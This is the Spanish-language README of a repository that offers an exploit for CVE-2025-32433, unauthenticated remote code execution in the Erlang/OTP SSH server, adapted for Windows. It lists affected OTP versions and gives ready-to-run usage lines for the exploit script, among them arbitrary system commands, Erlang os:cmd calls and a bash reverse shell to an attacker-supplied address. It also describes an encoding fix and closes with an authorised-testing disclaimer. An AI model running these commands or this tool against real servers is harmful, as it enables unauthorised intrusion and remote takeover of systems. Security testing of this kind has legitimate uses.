
Basado en la versión original:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Reemplazar la marca de verificación Unicode por un carácter ASCII para compatibilidad con Windows
Ejecución Remota de Código No Autenticada en SSH de Erlang/OTP
Este repositorio contiene un exploit para CVE-2025-32433, una vulnerabilidad crítica de ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP.
Características principales:
ID CVE: CVE-2025-32433
Gravedad: Crítica
Impacto: Ejecución Remota de Código No Autenticada
La vulnerabilidad permite a atacantes ejecutar comandos arbitrarios del sistema en servidores SSH de Erlang/OTP sin autenticación, mediante el envío de mensajes SSH especialmente diseñados.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 y versiones anteriores (probablemente)
# Ejecución básica de comandos
python exploit.py -t <ip-objetivo> -p 2222 -c "whoami"
# Ejecutar comando del sistema
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Ejecución de código Erlang puro
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Shell inversa
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/TU_IP/4444 0>&1"
-t, --target Dirección IP del objetivo (por defecto: 127.0.0.1)
-p, --port Puerto del objetivo (por defecto: 2222)
-c, --command Comando del sistema a ejecutar
-e, --erlang Código Erlang puro a ejecutar
Esta versión corrige el problema de codificación presente en el exploit original:
Problema: El exploit original utilizaba el carácter Unicode de marca de verificación (✓, U+2713) que causa errores de codificación GBK en Windows:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
Solución: Se reemplazó el carácter Unicode por el carácter ASCII estándar + para lograr compatibilidad entre plataformas.
El exploit funciona mediante:
os:cmd()Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsalo de forma responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.
Licencia MIT
Modificado para compatibilidad con Windows por chuzouX